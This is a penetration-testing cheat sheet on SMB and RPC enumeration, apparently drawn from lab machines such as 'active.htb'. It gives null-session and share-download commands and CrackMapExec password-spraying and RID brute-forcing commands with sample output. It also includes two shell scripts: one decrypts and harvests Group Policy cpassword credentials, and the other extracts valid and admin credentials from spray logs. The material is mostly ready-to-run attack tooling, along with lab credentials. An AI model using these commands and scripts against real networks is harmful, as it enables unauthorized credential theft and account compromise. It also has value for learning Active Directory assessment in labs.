SMB & RPC Enumeration


enum4linux IP


rpcclient -U '' -N IP

rpcclient> enumdomusers

hit tab twice at the rpcclient prompt to list the available commands

rpcclient> querydispinfo

enumdomusers returns one user:[NAME] rid:[0xHEX] line per account; querydispinfo adds the Name and Desc fields, and the description is where service-account passwords occasionally end up.


Null session

smbclient -L //IP -N
smbclient -L //IP -U '' -N

-N skips the password prompt; note that smbclient's -P means --machine-pass, not a password, so -U '' -P '' is not the way to pass an empty one.

Connect to a share

smbclient //IP/IPC$ -N
smbclient //IP/share -U user

IPC$ usually accepts a null session even when the other shares do not; it only exposes named pipes, so a successful connect confirms null sessions are allowed but there are no files to pull from it.

Connect and download recursively all resources

smb: \> recurse on
smb: \> prompt off
smb: \> mget *


With credentials, list shares and the permissions on each (add -R SHARE to list a share recursively); the SVC_TGS password below is the one recovered from GPP in the next section:

smbmap -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 -H IP

Group Policy Preferences (GPP)

Groups.xml (and Services.xml, ScheduledTasks.xml, Drives.xml, DataSources.xml, Printers.xml) under \\DC\SYSVOL\<domain>\Policies\ can carry a cpassword attribute. It is AES-256-CBC with a key Microsoft published in MS-GPPREF, so anyone who can read SYSVOL (every domain user) can recover the plaintext. The value below decrypts to GPPstillStandingStrong2k18, the SVC_TGS password used with smbmap above.

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
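The same decryption done with openssl, so the moving parts (static key, zero IV, UTF-16LE plaintext, stripped base64 padding) are visible, plus a harvester that pulls every cpassword out of a Groups.xml. This is an added example, not gpp-decrypt's code or anything from the original notes; it assumes GNU coreutils base64, an openssl binary, and the sample Groups.xml is constructed (only its cpassword is the real value quoted above).

```sh
#!/bin/sh
# Added example: cpassword -> plaintext without gpp-decrypt.
# The 32-byte key is the one Microsoft published in MS-GPPREF; it is identical in every
# domain, which is why any cpassword found on a share is recoverable.
# Assumes GNU coreutils base64 (-d) and openssl (assumptions of this example).
GPP_AES_KEY=4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b

# Group Policy strips the '=' padding from the base64 string; put it back.
gpp_pad_b64() {
    s=$1
    while [ $(( ${#s} % 4 )) -ne 0 ]; do s="$s="; done
    printf '%s' "$s"
}

# AES-256-CBC, all-zero IV, PKCS#7 padding; the plaintext is UTF-16LE.
# tr strips the UTF-16LE high bytes, which is enough for ASCII passwords;
# use iconv -f UTF-16LE -t UTF-8 instead if the password may contain non-ASCII.
gpp_decrypt() {
    gpp_pad_b64 "$1" | base64 -d |
    openssl enc -d -aes-256-cbc -K "$GPP_AES_KEY" -iv 00000000000000000000000000000000 |
    tr -d '\000'
    printf '\n'
}

# Constructed Groups.xml in the real file's layout; the cpassword is the one quoted above.
sample_groups_xml() {
cat <<'EOF'
<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="active.htb\SVC_TGS">
    <Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
  </User>
</Groups>
EOF
}

# Print "account plaintext" for every <Properties .../> element carrying a cpassword.
# Groups.xml names the account in userName; Services.xml uses accountName and
# ScheduledTasks.xml uses runAs, so all three are accepted.
gpp_harvest() {
    grep -o '<Properties [^>]*cpassword="[^"]*"[^>]*>' |
    while read -r props; do
        cp=$(printf '%s' "$props" | sed 's/.*cpassword="\([^"]*\)".*/\1/')
        un=$(printf '%s' "$props" | sed -En 's/.*(userName|accountName|runAs)="([^"]*)".*/\2/p')
        printf '%s %s\n' "${un:-?}" "$(gpp_decrypt "$cp")"
    done
}
```

Usage against a real share: smbclient //DC/SYSVOL -N -c 'recurse on; prompt off; mget *' and then gpp_harvest < Groups.xml for each file found. A cpassword attribute that is empty means the policy clears the password rather than sets one.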

CrackMapExec smb

Determine the password policy (lockout threshold and observation window) before spraying; works over a null session where the DC allows it, otherwise add -u user -p pass

crackmapexec smb IP --pass-pol

Test a list of users against a list of passwords: [+] is a valid login, [-] a failure with its NT status, and (signing:False) in the banner means SMB signing is not enforced on that host

└─# crackmapexec smb IP -u ./users.txt -p ./passwords.txt 
SMB   445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB   445    SUPPORTDESK      [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE 
SMB   445    SUPPORTDESK      [+] SupportDesk\Hazard:stealth1agent 

SID / RID bruteforcing

Cycle through RIDs with LSA LookupSids using any valid account (works even when SAMR enumeration is denied) to recover users and groups, including ones enumdomusers did not show

crackmapexec smb IP -u hazard -p stealth1agent --rid-brute

Password bruteforce

users.uniq is users.txt with duplicates removed, so that each account gets exactly one attempt per run; --continue-on-success keeps going after the first hit instead of stopping

Users / Users

Try every username as the password for every user (full cross-product: many attempts per account, so check the lockout threshold from --pass-pol first)

crackmapexec smb IP -u ./users.txt -p ./users.txt  --continue-on-success

Users / Username (1)

Try each username as its own password (one attempt per user: --no-bruteforce pairs line N of -u with line N of -p instead of trying every combination)

crackmapexec smb IP -u ./users.uniq -p ./users.uniq --continue-on-success --no-bruteforce 

Users with empty password

Try each user with an empty password (again one attempt per user)

└─# crackmapexec smb IP -u ./users.uniq -p '' --continue-on-success --no-bruteforce 
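Sorting a spray run's output into hits, admin hits, lockouts and unsigned hosts. This is an added example, not from the original notes; the sample log is constructed in the format of the crackmapexec output shown above, and its last two lines are invented to exercise the (Pwn3d!) and STATUS_ACCOUNT_LOCKED_OUT cases.

```sh
#!/bin/sh
# Added example: parse crackmapexec spray output. Live usage:
#   crackmapexec smb IP -u users.uniq -p passwords.txt --continue-on-success | tee spray.log
#   cme_locked_out < spray.log && echo "STOP: accounts are locking out"
#   cme_valid_creds < spray.log
# The sample below is constructed in the format of the output shown above.

sample_spray_log() {
cat <<'EOF'
SMB   445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB   445    SUPPORTDESK      [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE
SMB   445    SUPPORTDESK      [+] SupportDesk\Hazard:stealth1agent
SMB   445    SUPPORTDESK      [+] SupportDesk\Administrator:stealth1agent (Pwn3d!)
SMB   445    SUPPORTDESK      [-] SupportDesk\svc_backup:stealth1agent STATUS_ACCOUNT_LOCKED_OUT
EOF
}

# DOMAIN\user:password for every successful logon, (Pwn3d!) marker dropped.
# Caveat: a password containing a space is cut at the space by this pattern.
cme_valid_creds() {
    sed -n 's/.*\[+\] \([^ ]*\).*/\1/p'
}

# Only the hits crackmapexec flagged as local admin on the target.
cme_admin_creds() {
    grep -F '(Pwn3d!)' | sed -n 's/.*\[+\] \([^ ]*\).*/\1/p'
}

# Accounts that hit the lockout threshold. Exit status 0 means at least one did,
# which is the signal to stop the spray and wait out the observation window.
cme_locked_out() {
    grep STATUS_ACCOUNT_LOCKED_OUT | sed -n 's/.*\] \([^:]*\):.*/\1/p'
}

# Hosts whose banner says signing:False: the name printed just before [*].
# (Field position is used rather than a fixed column, so it works whether or
# not the IP column was trimmed as in the output above.)
cme_unsigned_hosts() {
    awk '/\[\*\]/ && /signing:False/ { for (i = 2; i <= NF; i++) if ($i == "[*]") print $(i-1) }'
}
```

Run cme_locked_out after every password round, not just at the end: one STATUS_ACCOUNT_LOCKED_OUT line means the threshold from --pass-pol was already crossed for that account and the same will happen to the rest of the list on the next round.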

